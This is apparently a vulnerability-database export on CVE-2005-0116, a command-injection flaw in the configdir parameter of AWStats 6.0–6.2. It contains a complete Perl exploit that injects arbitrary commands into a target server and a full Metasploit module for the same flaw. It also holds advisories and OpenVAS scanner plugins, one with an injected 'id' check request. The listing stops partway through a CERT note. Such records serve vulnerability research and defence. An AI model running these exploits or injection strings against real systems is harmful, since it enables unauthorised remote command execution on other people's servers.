{"id": "EDB-ID:773", "type": "exploitdb", "bulletinFamily": "exploit", "title": "AWStats 6.0-6.2 configdir Remote Command Execution Exploit perl code", "description": "AWStats configdir Remote Command Execution Exploit (perl code). CVE-2005-0116. Webapps exploit for cgi platform", "published": "2005-01-25T00:00:00", "modified": "2005-01-25T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/773/", "reporter": "GHC", "references": [], "cvelist": ["CVE-2005-0116"], "lastseen": "2016-01-31T12:50:01", "viewCount": 79, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2016-01-31T12:50:01", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-0116"]}, {"type": "saint", "idList": ["SAINT:7BE0E3254D8CF4455737A7AE1BA4F5F2", "SAINT:20A37B06255E4482165348149D6B457C", "SAINT:360F60468A59D80DCB80536A374F945B"]}, {"type": "openvas", "idList": ["OPENVAS:52229", "OPENVAS:54822", "OPENVAS:53512", "OPENVAS:136141256231016189"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-200501-36.NASL", "DEBIAN_DSA-682.NASL", "AWSTATS_CONFIGDIR.NASL", "FREEBSD_PKG_0F5A2B4D694B11D9A9E70001020EED82.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82351"]}, {"type": "osvdb", "idList": ["OSVDB:13002"]}, {"type": "exploitdb", "idList": ["EDB-ID:9912", "EDB-ID:772", "EDB-ID:16905"]}, {"type": "cert", "idList": ["VU:272296"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/UNIX/WEBAPP/AWSTATS_CONFIGDIR_EXEC"]}, {"type": "freebsd", "idList": ["0F5A2B4D-694B-11D9-A9E7-0001020EED82"]}, {"type": "debian", "idList": ["DEBIAN:DSA-682-1:3FA20"]}, {"type": "gentoo", "idList": ["GLSA-200501-36"]}], "modified": "2016-01-31T12:50:01", "rev": 2}, "vulnersScore": 7.6}, "sourceHref": "https://www.exploit-db.com/download/773/", "sourceData": "#!/usr/bin/perl\r\n#---GHC---------------------------------#\r\n#Remote command execution exploit #\r\n#Product: #\r\n#Advanced Web Statistics 6.0 - 6.2 #\r\n#URL:http://awstats.sourceforge.net #\r\n#Greets & respects to our friends: #\r\n#1dt.w0lf and all rst.void.ru #\r\n#Special greets 2 d0G4 #\r\n#& cr0n for link on bugtraq #\r\n#---not-PRIVATE-already--------------#\r\n# bug found by iDEFENSE #\r\n# http://www.idefense.com/ #\r\n# application/poi/display? #\r\n# id=185&type=vulnerabilities #\r\n# &flashstatus=true #\r\n#-----------------------------------------#\r\n\r\nuse IO::Socket;\r\n$banner = \"\r\n#################################################################\r\nGHC 2005\r\nRemote command execution exploit for:\r\nAdvanced Web Statistics 6.0 - 6.2\r\nUsage:\r\n>perl ./GHCaws.pl www.server.net /cgi-bin/awredir.pl \\\"uname -a\\\"\r\n#################################################################\r\n\";\r\n\r\n$bug_param = 'configdir';\r\n$id_start = 'b_exp';\r\n$id_exit = 'e_exp';\r\n$id_print = 0;\r\n$http_head = \"\\n\\n\";\r\n\r\nsub Print_Report {\r\n$str = $_[0];\r\nif ($str =~ m/$id_exit/i) {\r\nexit;\r\n}\r\nif ($str =~ m/$id_start/i) {\r\n$str =~ s/$id_start//ig;\r\n$id_print = 1;\r\n}\r\nif ($id_print == 1) {\r\nprint \"$str\";\r\n}\r\n}\r\n\r\nsub ConnectServer {\r\n$socket = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$server\", PeerPort => \"80\")\r\n|| die \"Error\\n\";\r\nprint $socket \"GET $dir\".'?'.$bug_param.'='.\"$expl HTTP/1.1\\n\";\r\nprint $socket \"Host: $server\\n\";\r\nprint $socket \"Accept: */*\\n\";\r\nprint $socket \"Connection: close\\n\\n\";\r\nwhile ($report = <$socket>) {\r\n&Print_Report(\"$report\");\r\n}\r\n}\r\n\r\n\r\nprint \"$banner\";\r\nif ($ARGV[0] && $ARGV[1] && $ARGV[2]) {\r\n$server = $ARGV[0];\r\n$dir = $ARGV[1];\r\n$cmd = $ARGV[2]; }\r\nelse {\r\nexit;\r\n}\r\n\r\n$expl = '|echo '.''.';echo '.$id_start.';'.$cmd.';echo '.$id_exit.';%00';\r\n$expl =~ s/\\W/\"%\".sprintf(\"%x\",ord($&))/eg;\r\n&ConnectServer;\r\n\r\n# milw0rm.com [2005-01-25]\r\n", "osvdbidlist": ["13002"]}

{"cve": [{"lastseen": "2020-12-09T19:22:18", "description": "AWStats 6.1, and other versions before 6.3, allows remote attackers to execute arbitrary commands via shell metacharacters in the configdir parameter to aswtats.pl.", "edition": 5, "cvss3": {}, "published": "2005-01-18T05:00:00", "title": "CVE-2005-0116", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-0116"], "modified": "2008-09-05T20:45:00", "cpe": ["cpe:/a:awstats:awstats:6.3"], "id": "CVE-2005-0116", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0116", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:awstats:awstats:6.3:*:*:*:*:*:*:*"]}], "saint": [{"lastseen": "2016-10-03T15:01:57", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "description": "Added: 02/14/2006 \nCVE: [CVE-2005-0116](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0116>) \nBID: [12298](<http://www.securityfocus.com/bid/12298>) \nOSVDB: [13002](<http://www.osvdb.org/13002>) \n\n\n### Background\n\n[AWStats](<http://awstats.sourceforge.net>) is a web application for showing web, FTP, and mail server statistics. \n\n### Problem\n\nInsufficient validation of the `**configdir**` parameter before being used in a PERL open call leads to remote command execution. \n\n### Resolution\n\nUpgrade to [AWStats](<http://awstats.sourceforge.net>) 6.3 or higher. \n\n### References\n\n[http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185&amp;type=vulnerabilities ](<http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185&type=vulnerabilities\n>) \n\n\n### Limitations\n\nExploit works on AWStats 6.2 on Linux. \n\n", "edition": 1, "modified": "2006-02-14T00:00:00", "published": "2006-02-14T00:00:00", "id": "SAINT:20A37B06255E4482165348149D6B457C", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/awstats_configdir", "type": "saint", "title": "AWStats configdir parameter command execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-06-04T23:19:32", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "description": "Added: 02/14/2006 \nCVE: [CVE-2005-0116](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0116>) \nBID: [12298](<http://www.securityfocus.com/bid/12298>) \nOSVDB: [13002](<http://www.osvdb.org/13002>) \n\n\n### Background\n\n[AWStats](<http://awstats.sourceforge.net>) is a web application for showing web, FTP, and mail server statistics. \n\n### Problem\n\nInsufficient validation of the `**configdir**` parameter before being used in a PERL open call leads to remote command execution. \n\n### Resolution\n\nUpgrade to [AWStats](<http://awstats.sourceforge.net>) 6.3 or higher. \n\n### References\n\n[http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185&amp;type=vulnerabilities ](<http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185&type=vulnerabilities\n>) \n\n\n### Limitations\n\nExploit works on AWStats 6.2 on Linux. \n\n", "edition": 4, "modified": "2006-02-14T00:00:00", "published": "2006-02-14T00:00:00", "id": "SAINT:7BE0E3254D8CF4455737A7AE1BA4F5F2", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/awstats_configdir", "title": "AWStats configdir parameter command execution", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T17:19:52", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "edition": 2, "description": "Added: 02/14/2006 \nCVE: [CVE-2005-0116](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0116>) \nBID: [12298](<http://www.securityfocus.com/bid/12298>) \nOSVDB: [13002](<http://www.osvdb.org/13002>) \n\n\n### Background\n\n[AWStats](<http://awstats.sourceforge.net>) is a web application for showing web, FTP, and mail server statistics. \n\n### Problem\n\nInsufficient validation of the `**configdir**` parameter before being used in a PERL open call leads to remote command execution. \n\n### Resolution\n\nUpgrade to [AWStats](<http://awstats.sourceforge.net>) 6.3 or higher. \n\n### References\n\n[http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185&amp;type=vulnerabilities ](<http://www.idefense.com/intelligence/vulnerabilities/display.php?id=185&type=vulnerabilities\n>) \n\n\n### Limitations\n\nExploit works on AWStats 6.2 on Linux. \n\n", "modified": "2006-02-14T00:00:00", "published": "2006-02-14T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/awstats_configdir", "id": "SAINT:360F60468A59D80DCB80536A374F945B", "type": "saint", "title": "AWStats configdir parameter command execution", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:52", "description": "", "published": "2009-10-30T00:00:00", "type": "packetstorm", "title": "AWStats configdir Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "modified": "2009-10-30T00:00:00", "id": "PACKETSTORM:82351", "href": "https://packetstormsecurity.com/files/82351/AWStats-configdir-Remote-Command-Execution.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'AWStats configdir Remote Command Execution', \n'Description' => %q{ \nThis module exploits an arbitrary command execution vulnerability in the \nAWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 \nare vulnerable. \n}, \n'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n['CVE', '2005-0116'], \n['OSVDB', '13002'], \n['BID', '12298'], \n['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'], \n], \n'Privileged' => false, \n'Payload' => \n{ \n'DisableNops' => true, \n'Space' => 512, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl ruby bash telnet', \n} \n}, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Targets' => [[ 'Automatic', { }]], \n'DisclosureDate' => 'Jan 15 2005', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('URI', [true, \"The full URI path to awstats.pl\", \"/cgi-bin/awstats.pl\"]), \n], self.class) \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => datastore['URI'], \n'vars_get' => \n{ \n'configdir' => '|echo;cat /etc/hosts;echo|' \n} \n}, 25) \n \nif (res and res.body.match(/localhost/)) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \ncommand = Rex::Text.uri_encode(payload.encoded) \nurlconfigdir = datastore['URI'] + \"?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|\" \n \nres = send_request_raw({ \n'uri' => urlconfigdir, \n'method' => 'GET', \n'headers' => \n{ \n'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', \n'Connection' => 'Close', \n} \n}, 25) \n \nif (res) \nprint_status(\"The server returned: #{res.code} #{res.message}\") \n \nm = res.body.match(/YYY\\n(.*)\\nYYY/m) \n \nif (m) \nprint_status(\"Command output from the server:\") \nprint(\"\\n\" + m[1] + \"\\n\\n\") \nelse \nprint_status(\"This server may not be vulnerable\") \nend \nelse \nprint_status(\"No response from the server\") \nend \nend \n \nend \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82351/awstats_configdir_exec.rb.txt"}], "openvas": [{"lastseen": "2017-07-02T21:10:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0116"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-09-15T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:52229", "href": "http://plugins.openvas.org/nasl.php?oid=52229", "type": "openvas", "title": "FreeBSD Ports: awstats", "sourceData": "#\n#VID 0f5a2b4d-694b-11d9-a9e7-0001020eed82\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: awstats\n\nCVE-2005-0116\nAWStats 6.1, and other versions before 6.3, allows remote attackers to\nexecute arbitrary commands via shell metacharacters in the configdir\nparameter.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://awstats.sourceforge.net/docs/awstats_changelog.txt\nhttp://www.idefense.com/application/poi/display?id=185&type=vulnerabilities&flashstatus=false\nhttp://marc.theaimsgroup.com/?l=full-disclosure&m=110600949323439\nhttp://www.vuxml.org/freebsd/0f5a2b4d-694b-11d9-a9e7-0001020eed82.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(52229);\n script_version(\"$Revision: 4075 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-09-15 15:13:05 +0200 (Thu, 15 Sep 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2005-0116\");\n script_bugtraq_id(12270);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: awstats\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"awstats\");\nif(!isnull(bver) && revcomp(a:bver, b:\"6.3\")<0) {\n txt += 'Package awstats version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:31:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0116"], "description": "The remote host is running AWStats, a free real-time logfile analyzer.\n\n The remote version of this software is prone to an input validation\n vulnerability.\n\n The issue is reported to exist because user supplied ", "modified": "2018-05-09T00:00:00", "published": "2005-11-03T00:00:00", "id": "OPENVAS:136141256231016189", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231016189", "type": "openvas", "title": "AWStats configdir parameter arbitrary cmd exec", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: awstats_configdir.nasl 9788 2018-05-09 15:53:43Z cfischer $\n#\n# AWStats configdir parameter arbitrary cmd exec\n#\n# Authors:\n# David Maciejak <david dot maciejak at kyxar dot fr>\n#\n# Copyright:\n# Copyright (C) 2005 David Maciejak\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:awstats:awstats\";\n\n# Ref: iDEFENSE\n# changes by rd: changed the web reqeuest\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.16189\");\n script_version(\"$Revision: 9788 $\");\n script_cve_id(\"CVE-2005-0116\");\n script_bugtraq_id(12270, 12298);\n script_tag(name:\"last_modification\", value:\"$Date: 2018-05-09 17:53:43 +0200 (Wed, 09 May 2018) $\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"AWStats configdir parameter arbitrary cmd exec\");\n script_category(ACT_ATTACK);\n script_copyright(\"This script is Copyright (C) 2005 David Maciejak\");\n script_family(\"Web application abuses\");\n script_dependencies(\"awstats_detect.nasl\");\n script_mandatory_keys(\"awstats/installed\");\n\n script_tag(name:\"summary\", value:\"The remote host is running AWStats, a free real-time logfile analyzer.\n\n The remote version of this software is prone to an input validation\n vulnerability.\n\n The issue is reported to exist because user supplied 'configdir' URI data passed\n to the 'awstats.pl' script is not sanitized.\");\n\n script_tag(name:\"impact\", value:\"An attacker may exploit this condition to execute commands remotely or disclose\n contents of web server readable files.\");\n\n script_tag(name:\"solution\", value:\"Upgrade at least to version 6.3 of this software.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit( 0 );\n\nhttp_check_remote_code (\n unique_dir:dir,\n extra_check:\"Check config file, permissions and AWStats documentation\",\n check_request:\"/awstats.pl?configdir=|echo%20Content-Type:%20text/html;%20echo%20;id|%00\",\n check_result:\"uid=[0-9]+.*gid=[0-9]+.*\",\n command:\"id\",\n port:port\n );\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:50:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0116", "CVE-2005-0363"], "description": "The remote host is missing an update to awstats\nannounced via advisory DSA 682-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53512", "href": "http://plugins.openvas.org/nasl.php?oid=53512", "type": "openvas", "title": "Debian Security Advisory DSA 682-1 (awstats)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_682_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 682-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"In addition to CVE-2005-0116 more vulnerabilities have been found in\nawstats, a powerful and featureful web server log analyzer with a CGI\nfrontend. Missing input sanitising can cause arbitrary commands to be\nexecuted.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 4.0-0.woody.2.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 6.2-1.2.\n\nWe recommend that you upgrade your awstats package.\";\ntag_summary = \"The remote host is missing an update to awstats\nannounced via advisory DSA 682-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20682-1\";\n\nif(description)\n{\n script_id(53512);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:56:38 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-0363\", \"CVE-2005-0116\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 682-1 (awstats)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"awstats\", ver:\"4.0-0.woody.2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:49:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0362", "CVE-2005-0116", "CVE-2005-0363"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200501-36.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54822", "href": "http://plugins.openvas.org/nasl.php?oid=54822", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200501-36 (awstats)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"AWStats fails to validate certain input, which could lead to the remote\nexecution of arbitrary code or to the leak of information.\";\ntag_solution = \"All AWStats users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-www/awstats-6.3-r2'\n\nNote: Users with the vhosts USE flag set should manually use webapp-config\nto finalize the update.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200501-36\nhttp://bugs.gentoo.org/show_bug.cgi?id=77963\nhttp://bugs.gentoo.org/show_bug.cgi?id=81775\nhttp://awstats.sourceforge.net/docs/awstats_changelog.txt\nhttp://www.idefense.com/application/poi/display?id=185\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200501-36.\";\n\n \n\nif(description)\n{\n script_id(54822);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2005-0116\", \"CVE-2005-0362\", \"CVE-2005-0363\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200501-36 (awstats)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-www/awstats\", unaffected: make_list(\"ge 6.3-r2\"), vulnerable: make_list(\"lt 6.3-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cert": [{"lastseen": "2020-09-18T20:43:29", "bulletinFamily": "info", "cvelist": ["CVE-2005-0116"], "description": "### Overview \n\nA lack of input validation in AWStats may allow a remote attacker to execute arbitrary commands.\n\n### Description \n\nAWStats is a Perl CGI script that collects and graphically displays statistics from web, FTP, and mail servers. The `configdir` parameter, within the awstats.pl Perl script, is supplied user-controlled data and then passed as a parameter to the Perl routine `open()`. A lack of input validation on the `configdir` parameter may allow an attacker to compromise a vulnerable server. If an attacker supplies this parameter with arbitrary commands prefixed with the '|' character, those commands will be executed on the server.\n\nPlease note that according to public reports, this vulnerability is being actively exploited. \n \n--- \n \n### Impact \n\nIf a remote attacker supplies AWStats with specially crafted input, that attacker may be able to execute arbitrary commands with the privileges of the attacked server process, in most cases user `nobody`. \n \n--- \n \n### Solution \n\n**Upgrade** \n \nThis issue has been corrected in [AWStats version 6.3](<http://awstats.sourceforge.net/#DOWNLOAD>). Users are strongly encouraged to upgrade to this version. \n \n--- \n \n### Vendor Information\n\n272296\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### AWStats __ Affected\n\nUpdated: February 10, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nAccording to [AWStats website](<http://awstats.sourceforge.net/>): \n\n \n_Warning, a security hole was recently found in AWStats versions from 5.0 to 6.2 when AWStats is used as a CGI: A remote user can execute arbitrary commands on your server using permissions of your web server user (in most cases user \"nobody\"). If you use AWStats with another version or with option AllowToUpdateStatsFromBrowser to 0, you are safe. If not, it is highly recommanded to update to 6.3 version that fix this security hole. _\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23272296 